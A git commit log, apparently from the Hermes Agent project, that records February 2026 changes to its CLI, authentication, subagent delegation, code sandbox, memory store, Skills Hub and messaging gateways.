- Enhanced user experience by providing both menu-based and fallback number-based selection methods for model choice.
2026-02-20 17:35:12 -08:00
teknium1
cfef34f7a6 feat: add multi-provider authentication and inference provider selection
- Implemented a multi-provider authentication system for the Hermes Agent, supporting OAuth for Nous Portal and traditional API key methods for OpenRouter and custom endpoints.
- Enhanced CLI with commands for logging in and out of providers, allowing users to authenticate and manage their credentials easily.
- Updated configuration options to select inference providers, with detailed documentation on usage and setup.
- Improved status reporting to include authentication status and provider details, enhancing user awareness of their current configuration.
- Added new files for authentication handling and updated existing components to integrate the new provider system.
2026-02-20 17:24:00 -08:00
teknium1
c007b9e5bd chore: update installer banner text for branding consistency
- Changed the banner message in both PowerShell and shell scripts to reflect the new branding of the Hermes Agent as an open source AI agent by Nous Research, enhancing clarity and consistency across installation scripts.
2026-02-20 11:20:59 -08:00
teknium1
b9f3518b33 refactor: streamline TODO.md for clarity and focus
- Removed outdated sections detailing existing tools and knowledge systems to enhance readability.
- Consolidated information on subagent architecture and interactive clarifying questions, emphasizing their current status and implementation details.
- Updated formatting and structure to improve navigation and understanding of the document's content.
2026-02-20 03:28:42 -08:00
teknium1
ba07d9d5e3 feat: enhance task delegation with spinner updates and progress display
- Added a spinner to visually indicate task delegation progress in quiet mode, improving user experience during batch processing.
- Implemented a method to update spinner text dynamically based on remaining tasks, providing real-time feedback.
- Enhanced the `delegate_task` function to include per-task completion messages, ensuring clarity on task status during execution.
- Updated the KawaiiSpinner class to allow message updates while running, facilitating better interaction during long-running tasks.
2026-02-20 03:23:23 -08:00
teknium1
90e5211128 feat: implement subagent delegation for task management
- Introduced the `delegate_task` tool, allowing the main agent to spawn child AIAgent instances with isolated context for complex tasks.
- Supported both single-task and batch processing (up to 3 concurrent tasks) to enhance task management capabilities.
- Updated configuration options for delegation, including maximum iterations and default toolsets for subagents.
- Enhanced documentation to provide clear guidance on using the delegation feature and its configuration.
- Added comprehensive tests to ensure the functionality and reliability of the delegation logic.
2026-02-20 03:15:53 -08:00
teknium1
c0d412a736 refactor: update search tool parameters and documentation for clarity
- Changed the target parameter from "content" and "files" to "grep" and "find" to better represent their functionality.
- Revised descriptions in the tool definitions and execution code schema to enhance understanding of search modes and output formats.
- Ensured consistency in the handling of search operations across the codebase.
2026-02-20 02:46:30 -08:00
teknium1
f9eb5edb96 refactor: rename search tool for clarity and consistency
- Updated the tool name from "search" to "search_files" across multiple files to better reflect its functionality.
- Adjusted related documentation and descriptions to ensure clarity in usage and expected behavior.
- Enhanced the toolset definitions and mappings to incorporate the new naming convention, improving overall consistency in the codebase.
2026-02-20 02:43:57 -08:00
teknium1
ba8b80a163 refactor: improve memory entry handling and file operations
- Replaced file locking with atomic file operations using temporary files to prevent race conditions during read/write.
- Added deduplication of memory and user entries to avoid exact duplicates in the memory store.
- Enhanced error handling for duplicate entries and improved logic for managing multiple matches in memory operations.
- Updated docstrings to clarify the behavior of file reading and writing methods, ensuring better understanding of the implementation.
2026-02-20 02:32:15 -08:00
teknium1
3b90fa5c9b fix: increase default timeout for code execution sandbox
- Updated the default timeout for sandbox script execution from 120 seconds to 300 seconds (5 minutes) to allow longer-running scripts.
- Enhanced comments in the code execution tool to clarify the timeout duration.
- Suppressed stdout and stderr output from internal tool handlers during execution to prevent clutter in the CLI interface.
2026-02-20 01:29:53 -08:00
teknium1
273b367f05 fix: update documentation and return types for web tools
- Revised docstrings for `web_search` and `web_extract` functions to clarify return types and structure.
- Updated the execution code schema documentation to reflect changes in the output format for both tools, ensuring consistency and improved understanding for users.
2026-02-19 23:30:01 -08:00
teknium1
783acd712d feat: implement code execution sandbox for programmatic tool calling
- Introduced a new `execute_code` tool that allows the agent to run Python scripts that call Hermes tools via RPC, reducing the number of round trips required for tool interactions.
- Added configuration options for timeout and maximum tool calls in the sandbox environment.
- Updated the toolset definitions to include the new code execution capabilities, ensuring integration across platforms.
- Implemented comprehensive tests for the code execution sandbox, covering various scenarios including tool call limits and error handling.
- Enhanced the CLI and documentation to reflect the new functionality, providing users with clear guidance on using the code execution tool.
2026-02-19 23:23:43 -08:00
teknium1
748f0b2b5f feat: enhance clarify tool with configurable timeout and countdown display
- Added a new configuration option for the clarify tool to set a custom timeout for user responses.
- Updated the clarify callback to implement a countdown display during user interaction, improving user experience.
- Refactored timeout handling to ensure the UI remains responsive and provides feedback on remaining time.
- Enhanced hint text to include countdown information when clarify questions are active.
2026-02-19 20:11:54 -08:00
teknium1
9350e26e68 feat: introduce clarifying questions tool for interactive user engagement
- Added a new `clarify_tool` to enable the agent to ask structured multiple-choice or open-ended questions to users.
- Implemented callback functionality for user interaction, allowing the platform to handle UI presentation.
- Updated the CLI and agent to support clarify questions, including timeout handling and response management.
- Enhanced toolset definitions and requirements to include the clarify tool, ensuring availability across platforms.
2026-02-19 20:06:14 -08:00
teknium1
997f793af1 feat: update TODO.md with enhancements to skills and memory systems
- Increased the tool count to 44+ and clarified the management of bundled and agent-managed skills.
- Introduced a persistent memory system with MEMORY.md and USER.md for agent notes and user profiles.
- Updated the storage evolution section to reflect the use of SQLite for sessions and clarified the organization of skills and memories.
- Added current status of memory types implemented, highlighting progress in agent intelligence capabilities.
2026-02-19 18:47:45 -08:00
teknium1
4d5f29c74c feat: introduce skill management tool for agent-created skills and skills migration to ~/.hermes
- Added a new `skill_manager_tool` to enable agents to create, update, and delete their own skills, enhancing procedural memory capabilities.
- Updated the skills directory structure to support user-created skills in `~/.hermes/skills/`, allowing for better organization and management.
- Enhanced the CLI and documentation to reflect the new skill management functionalities, including detailed instructions on creating and modifying skills.
- Implemented a manifest-based syncing mechanism for bundled skills to ensure user modifications are preserved during updates.
2026-02-19 18:25:53 -08:00
teknium1
d070b8698d fix: escape file glob patterns in ShellFileOperations
- Updated the file glob and include filters in the ShellFileOperations class to escape shell arguments, preventing unintended shell expansion.
- Added comments to clarify the necessity of quoting for file glob patterns.
2026-02-19 15:12:02 -08:00
teknium1
057d3e1810 feat: enhance search functionality in ShellFileOperations
- Updated the `_search_with_rg` and `_search_with_grep` methods to include filename in the output and improve result handling.
- Adjusted result fetching to account for context lines, ensuring accurate total counts and pagination.
- Enhanced parsing logic for matches and context lines, improving the accuracy of search results.
- Refactored result slicing to maintain consistency across output modes, ensuring users receive the correct number of results.
2026-02-19 15:10:17 -08:00
teknium1
d49af633f0 feat: enhance command execution with stdin support
- Modified the `_exec` method in `ShellFileOperations` to accept `stdin_data`, allowing large content to be piped directly to commands, bypassing ARG_MAX limitations.
- Updated the `execute` method in various environment classes (`_LocalEnvironment`, `_SingularityEnvironment`, `_SSHEnvironment`, `_DockerEnvironment`) to support `stdin_data`, improving command execution flexibility.
- Removed the unique marker generation for heredoc in favor of direct stdin piping, simplifying file writing operations and enhancing performance for large files.
2026-02-19 14:50:51 -08:00
teknium1
3191a9ba11 feat: add new conversation command and enhance command handling
- Introduced the `/new` command to start a new conversation, resetting the history.
- Updated command handling in the CLI and various platform adapters (Discord, Slack, Telegram) to support the new command.
- Added help command functionality to list available commands, improving user guidance.
- Enhanced command mapping for better integration across platforms, ensuring consistent command behavior.
2026-02-19 14:31:53 -08:00
teknium1
53e13fe1f1 feat: add Slack and WhatsApp setup prompts in setup wizard
- Implemented prompts for configuring Slack bot and WhatsApp bridge during the setup process.
- Added instructions for creating a Slack app and saving necessary tokens, enhancing user guidance.
- Included security recommendations for restricting bot access and a reminder to start the messaging gateway after setup.
2026-02-19 12:33:09 -08:00
teknium1
59cb0cecb2 feat: add messaging gateway startup functionality
- Introduced a new function to check for configured messaging platform tokens and prompt the user to start the gateway.
- Updated the installation scripts to automatically start the gateway if messaging tokens are detected, enhancing user experience.
- Expanded the README to include instructions for starting the gateway, ensuring users are informed about the necessary steps for message handling.
2026-02-19 09:43:46 -08:00
teknium1
1c6846c4c2 Merge branch 'main' of github.com:NousResearch/Hermes-Agent 2026-02-19 09:37:27 -08:00
teknium1
b88e441a07 feat: implement cross-channel messaging functionality
- Enhanced the `handle_send_message_function_call` to support sending messages to multiple platforms (Telegram, Discord, Slack, WhatsApp) using their respective APIs.
- Added error handling for missing parameters and platform configuration issues.
- Introduced asynchronous message sending with helper functions for each platform, improving responsiveness and reliability.
- Updated documentation within the function to clarify usage and requirements.
2026-02-19 09:37:25 -08:00
teknium1
4f57d7116d Improved stdout handling in the terminal tool to prevent deadlocks by implementing a background thread to continuously drain output, ensuring smooth command execution without blocking. 2026-02-19 09:26:31 -08:00
teknium1
422607df7c feat: expand README with update and messaging gateway instructions
- Added detailed sections for updating the Hermes agent, including quick and manual update methods.
- Introduced a messaging gateway section with setup instructions for Telegram, Discord, and Slack, along with commands for managing the gateway.
- Included security recommendations and context file usage to enhance user guidance.
2026-02-19 02:10:02 -08:00
teknium1
3f4b494c61 refactor: streamline thinking spinner behavior in AIAgent
- Updated the logic for stopping the thinking spinner to improve clarity in tool execution messages.
- Removed unnecessary checks for tool calls, simplifying the spinner's stop behavior while maintaining informative output for users.
2026-02-19 01:56:04 -08:00
teknium1
109dffb242 fix: refine dynamic height adjustment for input area in CLI
- Updated the input area height calculation to ensure it matches the exact line count of content, eliminating extra blank space.
- Adjusted the return values to improve the responsiveness of the input area, enhancing user experience when adding newlines.
2026-02-19 01:53:36 -08:00
teknium1
0e8ee051c6 feat: replace framed input with horizontal rules in CLI
- Updated the input area layout by replacing the styled border frame with horizontal rules above and below the input, enhancing visual clarity.
- Adjusted the layout to ensure the input area grows dynamically with content while maintaining a consistent appearance with inline completions.
- Modified style definitions to reflect the new horizontal rule design, improving the overall aesthetics of the CLI.
2026-02-19 01:51:54 -08:00
teknium1
5c545e67f3 feat: add styled border frame to input area in CLI
- Wrapped the input area in a styled border frame to enhance visual structure and user experience.
- Updated layout to accommodate the framed input, ensuring consistent appearance with inline completions below the input area.
- Introduced new style definitions for the input frame to improve overall aesthetics of the CLI.
2026-02-19 01:49:50 -08:00
teknium1
2daf5e4296 fix: improve CLI output rendering and response display
- Adjusted console width handling to ensure consistent output formatting.
- Introduced a short sleep after flushing stdout to allow for proper rendering of tool/status lines before displaying responses.
- Enhanced the response display by modifying the rendering logic to improve visual clarity and prevent interleaving of output.
2026-02-19 01:46:56 -08:00
teknium1
d0c8dd78c2 fix: ensure proper output rendering in CLI by flushing stdout
- Added a flush of the StdoutProxy buffer to ensure that tool/status lines render above the response box, preventing interleaving of output.
- Combined the rendering of the response and the surrounding box into a single _cprint call for improved visual consistency and clarity.
2026-02-19 01:43:15 -08:00
teknium1
21c3e9973a feat: enhance CLI output formatting with dynamic borders
- Added dynamic top and bottom borders to the response output in the HermesCLI, improving visual structure and readability.
- Implemented width adjustments for the borders based on console size, ensuring consistent appearance across different terminal environments.
- This change enhances the overall user experience by providing a clearer separation of messages in the CLI.
2026-02-19 01:39:01 -08:00
teknium1
8e4d013154 feat: improve ANSI text rendering in CLI
- Introduced a new function `_cprint` to handle ANSI-colored text rendering using prompt_toolkit's native capabilities, ensuring proper display of colors and formatting.
- Updated various print statements in the HermesCLI to utilize `_cprint`, enhancing the visual output of user messages and conversation indicators.
- This change improves the overall user experience by providing clearer and more visually appealing text in the CLI.
2026-02-19 01:34:14 -08:00
teknium1
37fb01b17d feat: enhance conversation display with ANSI escape codes
- Added ANSI escape codes for improved visual formatting in the CLI, including bold and colored text for user messages and conversation headers.
- Simplified the output structure by removing unnecessary visual separators and adapting the display to enhance readability and user experience.
2026-02-19 01:23:23 -08:00
teknium1
ac0a70b369 feat: enhance input area height adjustment in CLI
- Implemented dynamic height adjustment for the input area in HermesCLI to accommodate varying content lines, ensuring that newlines (Alt+Enter) remain visible.
- This change improves usability by preventing internal scrolling of the input area when displaying output from the agent.
2026-02-19 01:14:53 -08:00
teknium1
a4bc6f73d7 refactor: simplify CLI layout by integrating inline completions
- Updated the HermesCLI layout to replace the floating completion menu with an inline CompletionsMenu, ensuring it appears consistently below the input area.
- This change enhances user experience by maintaining visibility of completions even after agent output fills the terminal, improving usability in non-full-screen modes.
2026-02-19 01:11:02 -08:00
teknium1
56ee8a5cc6 refactor: remove 'read' action from memory tool and agent logging
- Eliminated the 'read' action from the memory tool and related logging in the agent, streamlining the available actions to 'add', 'replace', and 'remove'.
- Updated error messages and documentation to reflect the removal of the 'read' action, ensuring clarity in the API's usage.
2026-02-19 01:03:08 -08:00
teknium1
440c244cac feat: add persistent memory system + SQLite session store
Two-part implementation:

Part A - Curated Bounded Memory:
- New memory tool (tools/memory_tool.py) with MEMORY.md + USER.md stores
- Character-limited (2200/1375 chars), § delimited entries
- Frozen snapshot injected into system prompt at session start
- Model manages pruning via replace/remove with substring matching
- Usage indicator shown in system prompt header

Part B - SQLite Session Store:
- New hermes_state.py with SessionDB class, FTS5 full-text search
- Gateway session.py rewritten to dual-write SQLite + legacy JSONL
- Compression-triggered session splitting with parent_session_id chains
- New session_search tool with Gemini Flash summarization of matched sessions
- CLI session lifecycle (create on launch, close on exit)

Also:
- System prompt now cached per session, only rebuilt on compression
  (fixes prefix cache invalidation from date/time changes every turn)
- Config version bumped to 3, hermes doctor checks for new artifacts
- Disabled in batch_runner and RL environments
2026-02-19 00:57:31 -08:00
teknium1
655303f2f1 Add skill name resolution and enhanced install confirmation in Skills Hub
- Introduced a new function `_resolve_short_name` to convert short skill names to full identifiers, improving user experience during skill installation.
- Updated the `do_install` function to utilize the new resolution method for identifiers without slashes, ensuring accurate skill fetching.
- Enhanced the install confirmation process to include a disclaimer about third-party skills, emphasizing user responsibility and security awareness.
2026-02-18 16:20:35 -08:00
teknium1
14e59706b7 Add Skills Hub — universal skill search, install, and management from online registries
Implements the Hermes Skills Hub with agentskills.io spec compliance,
multi-registry skill discovery, security scanning, and user-driven
management via CLI and /skills slash command.

Core features:
- Security scanner (tools/skills_guard.py): 120 threat patterns across
  12 categories, trust-aware install policy (builtin/trusted/community),
  structural checks, unicode injection detection, LLM audit pass
- Hub client (tools/skills_hub.py): GitHub, ClawHub, Claude Code
  marketplace, and LobeHub source adapters with shared GitHubAuth
  (PAT + gh CLI + GitHub App), lock file provenance tracking, quarantine
  flow, and unified search across all sources
- CLI interface (hermes_cli/skills_hub.py): search, install, inspect,
  list, audit, uninstall, publish (GitHub PR), snapshot export/import,
  and tap management — powers both `hermes skills` and `/skills`

Spec conformance (Phase 0):
- Upgraded frontmatter parser to yaml.safe_load with fallback
- Migrated 39 SKILL.md files: tags/related_skills to metadata.hermes.*
- Added assets/ directory support and compatibility/metadata fields
- Excluded .hub/ from skill discovery in skills_tool.py

Updated 13 config/doc files including README, AGENTS.md, .env.example,
setup wizard, doctor, status, pyproject.toml, and docs.
2026-02-18 16:09:05 -08:00
teknium1
d59e93d5e9 Enhance platform toolset configuration and CLI toolset handling
- Introduced a new configuration section in `cli-config.yaml.example` for defining platform-specific toolsets, allowing for greater customization of available tools per platform.
- Updated the CLI to check for user-defined toolsets in the configuration, falling back to the default `hermes-cli` toolset if none are specified.
- Enhanced the `GatewayRunner` class to load platform-specific toolsets from the configuration, ensuring that the correct tools are enabled based on the platform being used.
2026-02-17 23:39:24 -08:00
teknium1
9e85408c7b Add todo tool for task management and enhance CLI features
- Introduced a new `todo_tool.py` for planning and tracking multi-step tasks, enhancing the agent's capabilities.
- Updated CLI to include a floating autocomplete dropdown for commands and improved user instructions for better navigation.
- Revised toolsets to incorporate the new `todo` tool and updated documentation to reflect changes in available tools and commands.
- Enhanced user experience with new keybindings and clearer command descriptions in the CLI.
2026-02-17 23:30:31 -08:00
teknium1
225ae32e7a Enhance CLI layout with floating completion menu
- Updated the layout in HermesCLI to include a floating completion menu, improving user experience by providing real-time suggestions as users type.
- Refactored the layout structure to utilize FloatContainer, ensuring the input area remains accessible while displaying the completion menu dynamically.
2026-02-17 23:04:48 -08:00
teknium1
50ef18644b Update multiline input instructions in HermesCLI
- Revised user instructions to reflect the removal of the Ctrl+Enter key binding for new lines, simplifying the input method.
- Clarified that Alt+Enter is now the sole key for multi-line input, enhancing user experience.
2026-02-17 22:53:48 -08:00
teknium1
41608beb35 Update multiline input handling in HermesCLI
- Removed the Shift+Enter key binding for inserting new lines, simplifying the input method.
- Introduced Ctrl+Enter as the primary key for multi-line input, ensuring better compatibility across terminals.
- Updated user instructions to reflect the new key bindings for a clearer user experience.
2026-02-17 22:51:25 -08:00
teknium1
d9a8e421a4 Enhance multiline input handling in HermesCLI
- Patched prompt_toolkit to recognize Shift+Enter as a distinct key for inserting new lines, improving the multiline input experience.
- Added Alt+Enter as a fallback for terminals that do not support Shift+Enter, ensuring consistent functionality across different environments.
- Updated user instructions to reflect the new key bindings for multiline input.
2026-02-17 21:53:19 -08:00
teknium1
d7cef744ec Add autocomplete and multiline support in HermesCLI input
- Introduced SlashCommandCompleter for command autocompletion, enhancing user experience by suggesting commands as users type.
- Enabled multiline input with Shift+Enter, allowing users to enter longer messages more conveniently.
- Implemented paste detection to handle large text inputs, saving them to temporary files and replacing them with compact references in the input area.
- Updated input area styling and hint display to improve usability and feedback during agent operation.
2026-02-17 21:47:54 -08:00
teknium1
54cbf30c14 Refactor dynamic prompt and layout in HermesCLI
- Updated the dynamic prompt to display the Hermes symbol when the agent is active, enhancing user feedback.
- Introduced a spacer line in the layout to prevent spinner output from overlapping the input cursor, improving usability.
- Adjusted the overall layout to maintain a clean interface while accommodating dynamic elements.
2026-02-17 21:34:49 -08:00
teknium1
dfa3c6265c Refactor CLI input prompt and layout in HermesCLI
- Updated the input area prompt to dynamically reflect agent status, enhancing user feedback during operation.
- Removed the status line from the layout to streamline the interface, focusing solely on the input area.
- Adjusted styling for prompt states to improve visual clarity and user experience.
2026-02-17 21:33:00 -08:00
teknium1
a7f52911e1 Refactor CLI output formatting in AIAgent
- Removed ANSI escape codes for color in tool activity messages to simplify output.
- Updated the _get_cute_tool_message method to provide a cleaner, more consistent format for various tool activities.
- Enhanced readability by aligning messages and removing unnecessary complexity, ensuring a more straightforward user experience.
2026-02-17 21:29:23 -08:00
teknium1
1e31614572 Refactor tool activity messages in AIAgent for improved CLI output
- Introduced ANSI escape codes for color-coded CLI messages to enhance readability.
- Updated the _get_cute_tool_message method to generate clean, aligned activity lines for various tools, replacing kawaii ASCII art with a more structured format.
- Simplified message construction for web tools, terminal commands, and process management, ensuring consistent and scannable output.
2026-02-17 21:26:41 -08:00
teknium1
3b615b0f7a Enhance tool previews in AIAgent and GatewayRunner
- Updated the _build_tool_preview function to include detailed previews for new tools: 'todo', 'send_message', and various 'rl_' tools, improving user feedback during task execution.
- Added emoji representations for tools in GatewayRunner, including 'process', 'todo', and 'send_message', to enhance visual clarity in progress messages.
- Improved handling of task management and messaging outputs, ensuring more informative and user-friendly interactions.
2026-02-17 17:11:31 -08:00
teknium1
e184f5ab3a Add todo tool for agent task planning and management
Single `todo` tool that reads (no params) or writes (provide todos array
with merge flag). In-memory TodoStore on AIAgent, no system prompt
mutation, behavioral guidance in tool description only. State re-injected
after context compression events. Gateway sessions hydrate from
conversation history. Added to all platform toolsets.

Also wired into RL agent_loop.py with per-run TodoStore and fixed
browser_snapshot user_task passthrough from first user message.
2026-02-17 17:02:33 -08:00
Sam Herring
d0f82e6dcc Removing random project notes doc 2026-02-17 08:02:29 -08:00
teknium1
49e1f9ea89 Refactor TODO.md to summarize future improvements for the Hermes Agent, focusing on subagent architecture, task management, dynamic skills expansion, and interactive clarifying questions. Key ideas include context isolation for subagents, task decomposition, progress tracking, and skill acquisition from successful tasks. 2026-02-17 03:24:38 -08:00
teknium1
6731230d73 Add special handling for 'process' tool in _build_tool_preview function
- Enhanced the _build_tool_preview function to include specific formatting for the 'process' tool, displaying action, session_id, data, and timeout when applicable.
- This update improves the clarity of tool previews, particularly for actions that require session tracking and timeout management.
2026-02-17 03:18:27 -08:00
teknium1
ec59d71e60 Update PTY write handling in ProcessRegistry to ensure data is encoded as bytes before writing. This change improves compatibility with string inputs and clarifies the expected data type in comments. 2026-02-17 03:14:47 -08:00
teknium1
bdac541d1e Rename OPENAI_API_KEY to HERMES_OPENAI_API_KEY in configuration and codebase for clarity and to avoid conflicts. Update related documentation and error messages to reflect the new key name, ensuring backward compatibility with existing setups. 2026-02-17 03:11:17 -08:00
teknium1
061fa70907 Add background process management with process tool, wait, PTY, and stdin support
New process registry and tool for managing long-running background processes
across all terminal backends (local, Docker, Singularity, Modal, SSH).

Process Registry (tools/process_registry.py):
- ProcessSession tracking with rolling 200KB output buffer
- spawn_local() with optional PTY via ptyprocess for interactive CLIs
- spawn_via_env() for non-local backends (runs inside sandbox, never on host)
- Background reader threads per process (Popen stdout or PTY)
- wait() with timeout clamping, interrupt support, and transparent limit reporting
- JSON checkpoint to ~/.hermes/processes.json for gateway crash recovery
- Module-level singleton shared across agent loop, gateway, and RL

Process Tool (model_tools.py):
- 7 actions: list, poll, log, wait, kill, write, submit
- Paired with terminal in all toolsets (CLI, messaging, RL)
- Timeout clamping with transparent notes in response

Terminal Tool Updates (tools/terminal_tool.py):
- Replaced nohup background mode with registry spawn (returns session_id)
- Added workdir parameter for per-command working directory
- Added check_interval parameter for gateway auto-check watchers
- Added pty parameter for interactive CLI tools (Codex, Claude Code)
- Updated TERMINAL_TOOL_DESCRIPTION with full background workflow docs
- Cleanup thread now respects active background processes (won't reap sandbox)

Gateway Integration (gateway/run.py, session.py, config.py):
- Session reset protection: sessions with active processes exempt from reset
- Default idle timeout increased from 2 hours to 24 hours
- from_dict fallback aligned to match (was 120, now 1440)
- session_key env var propagated to process registry for session mapping
- Crash recovery on gateway startup via checkpoint probe
- check_interval watcher: asyncio task polls process, delivers updates to platform

RL Safety (environments/):
- tool_context.py cleanup() kills background processes on episode end
- hermes_base_env.py warns when enabled_toolsets is None (loads all tools)
- Process tool safe in RL via wait() blocking the agent loop

Also:
- Added ptyprocess as optional dependency (in pyproject.toml [pty] extra + [all])
- Fixed pre-existing bug: rl_test_inference missing from TOOL_TO_TOOLSET_MAP
- Updated AGENTS.md with process management docs and project structure
- Updated README.md terminal section with process management overview
2026-02-17 02:51:31 -08:00
teknium1
48b5cfd085 Add skip_context_files option to AIAgent for batch processing
- Introduced a new parameter `skip_context_files` in the AIAgent class to control the inclusion of context files (SOUL.md, AGENTS.md, .cursorrules) in the system prompt.
- Updated the _process_single_prompt function to set `skip_context_files` to True, preventing pollution of trajectories during batch processing and data generation.
2026-02-16 22:40:31 -08:00
teknium1
a7609c97be Update docs to match backend key rename and CWD behavior
- cli-config.yaml.example: env_type → backend everywhere, matching the
  documented config key that hermes_cli/config.py and README already use
- cli-config.yaml.example: added comments clarifying cwd is a path
  INSIDE the target environment for non-local backends
- AGENTS.md: updated terminal.cwd description to explain "." only
  resolves to host CWD for the local backend
- .env.example: updated TERMINAL_CWD comment to warn against using
  host-local paths with remote backends, lists per-backend defaults
2026-02-16 22:31:41 -08:00
teknium1
c33feb6dc9 Fix host CWD leaking into non-local terminal backends
When using Modal, Docker, SSH, or Singularity as the terminal backend
from the CLI, the agent resolved cwd: "." to the host machine's local
path (e.g. /Users/rewbs/code/hermes-agent) and passed it to the remote
sandbox, where it doesn't exist. All commands failed with "No such file
or directory".

Root cause: cli.py unconditionally resolved "." to os.getcwd() and wrote
it to TERMINAL_CWD regardless of backend type. Every tool then used that
host-local path as the working directory inside the remote environment.

Fixes:
- cli.py: only resolve "." to os.getcwd() for the local backend. For all
  remote backends (ssh, docker, modal, singularity), leave TERMINAL_CWD
  unset so the tool layer uses per-backend defaults (/root, /, ~, etc.)
- terminal_tool.py: added sanity check -- if TERMINAL_CWD contains a
  host-local prefix (/Users/, /home/, C:\) for a non-local backend, log
  a warning and fall back to the backend's default
- terminal_tool.py: SSH default CWD is now ~ instead of os.getcwd()
- file_operations.py: last-resort CWD fallback changed from os.getcwd()
  to "/" so host paths never leak into remote file operations
2026-02-16 22:30:04 -08:00
teknium1
2c7deb41f6 Fix Modal backend not working from CLI
Two config systems used different key names for the terminal backend:
- hermes_cli/config.py, README, and all docs use "terminal.backend"
- cli.py's env var mapping only recognized "terminal.env_type"

Users following the docs who set `backend: modal` in ~/.hermes/config.yaml
had it silently ignored -- TERMINAL_ENV always defaulted to "local".

Additionally, when no config file existed, cli.py's hardcoded defaults
overwrote any TERMINAL_ENV=modal set in .env, despite the comment saying
"env vars take precedence."

Fixes:
- cli.py now normalizes "backend" -> "env_type" (backend takes precedence)
- Defaults no longer overwrite .env when no config file terminal section exists
- hermes status reads from config as fallback when env var isn't set

Also fixes four related bugs found in the Modal/sandbox lifecycle:
- file_tools cache not cleared on sandbox cleanup (stale ops on dead sandbox)
- Global lock held during slow Modal teardown (blocked all tool calls 10-15s)
- Race condition in file_tools between existence check and access (KeyError)
- Per-task creation locks never cleaned up (memory leak)
2026-02-16 19:47:23 -08:00
teknium1
8117d0adab Refactor file operations and environment management in file_tools and terminal_tool
- Improved the caching mechanism for ShellFileOperations to ensure stale entries are invalidated when environments are cleaned up.
- Enhanced thread safety by refining the use of locks during environment creation and cleanup processes.
- Streamlined the cleanup of inactive environments to prevent blocking other tool calls, ensuring efficient resource management.
- Added error handling and messaging improvements for better user feedback during environment cleanup.
2026-02-16 19:37:40 -08:00
teknium1
01a3a6ab0d Implement cleanup guard to prevent multiple executions on exit
- Introduced a new cleanup function that ensures terminal and browser sessions are cleaned up only once during application exit.
- Updated atexit registration to use the new cleanup function, enhancing resource management and preventing potential issues from multiple cleanup calls.
- Modified terminal cleanup messaging to only display when environments are cleaned, improving user feedback.
2026-02-16 02:43:45 -08:00
teknium1
45a8098d3a Remove browserbase SDK check and add Node.js and agent-browser validation in doctor script
- Removed the check for the browserbase SDK from the optional packages list.
- Added validation for Node.js installation and the presence of the agent-browser package, providing feedback on their status for browser automation tools.
2026-02-16 02:41:24 -08:00
teknium1
60812ae041 Enhance configuration checks and persona file creation in doctor and install scripts
- Updated the doctor script to load environment variables from user-specific and project-specific `.env` files, improving configuration management.
- Added checks for the existence of the `SOUL.md` persona file, providing feedback on its status and creating it with a template if missing.
- Enhanced install scripts to create the `SOUL.md` file if it doesn't exist, ensuring users can easily customize the agent's personality.
2026-02-16 02:38:19 -08:00
teknium1
635bec06cb Update tool definitions handling in GatewayRunner
- Modified the retrieval of tool definitions to use the agent result's "tools" key, ensuring accurate logging in the transcript.
- Enhanced the response structure to include tools in the final output, improving the clarity of tool usage in session interactions.
2026-02-16 00:55:18 -08:00
teknium1
0f58dfdea4 Enhance agent response handling and transcript logging
- Refactored the agent response processing to return a comprehensive result dictionary, including final responses and full message history.
- Improved transcript logging to capture the complete conversation, including tool calls and intermediate reasoning, facilitating session resumption and debugging.
- Added handling for fresh sessions to include tool definitions in the transcript for clarity.
- Implemented logic to filter and timestamp new messages, ensuring accurate logging of user and assistant interactions.
2026-02-16 00:53:17 -08:00
teknium1
dd5fe334f3 Refactor configuration handling to improve user experience
- Implemented deep copy of DEFAULT_CONFIG to prevent mutations during config loading.
- Enhanced user config merging process to clarify the deep merge of user values over defaults.
- Added newline handling when appending environment variables to ensure proper formatting.
- Updated the set_config_value function to write only user-specific configurations back to the file, avoiding overwriting default values.
2026-02-16 00:33:45 -08:00
teknium1
e0c9d495ef Refine configuration migration process to improve user experience
- Updated prompts for the OPENAI_BASE_URL to clarify its use for custom endpoints.
- Enhanced the migration function to skip "advanced" environment variables during interactive configuration, streamlining the setup for standard users.
- Improved messaging for missing optional API keys, ensuring clearer guidance for users during configuration.
2026-02-15 21:53:59 -08:00
teknium1
2f34e6fd30 Update OpenAI configuration prompts for clarity and detail
- Revised descriptions and prompts for the OPENAI_BASE_URL and OPENAI_API_KEY environment variables to enhance user understanding.
- Added a URL reference for the OPENAI_API_KEY to guide users in obtaining their API key.
- Specified the use of the API key for voice transcription and custom endpoints, improving the overall configuration documentation.
2026-02-15 21:48:07 -08:00
teknium1
69aa35a51c Add messaging platform enhancements: STT, stickers, Discord UX, Slack, pairing, hooks
Major feature additions inspired by OpenClaw/ClawdBot integration analysis:

Voice Message Transcription (STT):
- Auto-transcribe voice/audio messages via OpenAI Whisper API
- Download voice to ~/.hermes/audio_cache/ on Telegram/Discord/WhatsApp
- Inject transcript as text so all models can understand voice input
- Configurable model (whisper-1, gpt-4o-mini-transcribe, gpt-4o-transcribe)

Telegram Sticker Understanding:
- Describe static stickers via vision tool with JSON-backed cache
- Cache keyed by file_unique_id avoids redundant API calls
- Animated/video stickers get emoji-based fallback description

Discord Rich UX:
- Native slash commands (/ask, /reset, /status, /stop) via app_commands
- Button-based exec approvals (Allow Once / Always Allow / Deny)
- ExecApprovalView with user authorization and timeout handling

Slack Integration:
- Full SlackAdapter using slack-bolt with Socket Mode
- DMs, channel messages (mention-gated), /hermes slash command
- File attachment handling with bot-token-authenticated downloads

DM Pairing System:
- Code-based user authorization as alternative to static allowlists
- 8-char codes from unambiguous alphabet, 1-hour expiry
- Rate limiting, lockout after failed attempts, chmod 0600 on data
- CLI: hermes pairing list/approve/revoke/clear-pending

Event Hook System:
- File-based hook discovery from ~/.hermes/hooks/
- HOOK.yaml + handler.py per hook, sync/async handler support
- Events: gateway:startup, session:start/reset, agent:start/step/end
- Wildcard matching (command:* catches all command events)

Cross-Channel Messaging:
- send_message agent tool for delivering to any connected platform
- Enables cron job delivery and cross-platform notifications

Human-Like Response Pacing:
- Configurable delays between message chunks (off/natural/custom)
- HERMES_HUMAN_DELAY_MODE env var with min/max ms settings

Warm Injection Message Style:
- Retrofitted image vision messages with friendly kawaii-consistent tone
- All new injection messages (STT, stickers, errors) use warm style

Also: updated config migration to prompt for optional keys interactively,
bumped config version, updated README, AGENTS.md, .env.example,
cli-config.yaml.example, install scripts, pyproject.toml, and toolsets.
2026-02-15 21:38:59 -08:00
teknium1
5404a8fcd8 Enhance image handling and analysis capabilities across platforms
- Updated the vision tool to accept both HTTP/HTTPS URLs and local file paths for image analysis.
